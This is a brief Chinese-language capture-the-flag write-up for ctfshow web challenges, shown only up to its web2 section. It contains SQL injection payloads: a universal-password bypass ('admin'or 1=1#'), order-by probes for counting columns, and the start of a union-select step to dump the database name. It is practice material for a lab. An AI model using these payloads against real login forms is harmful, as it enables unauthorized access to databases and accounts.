文章目录 web签到题 web2 web3 web4 web5 web签到题 F12查看源码即可 web2 尝试万能密码 admin'or 1=1# 1.order by查找回显数 username=ctfshow' order by 3 #&password=1 username=ctfshow' order by 4 #&password=1 结果:在3时正常回显,4是无回显,说明回显数为3 2.使用union select 联合查询爆库名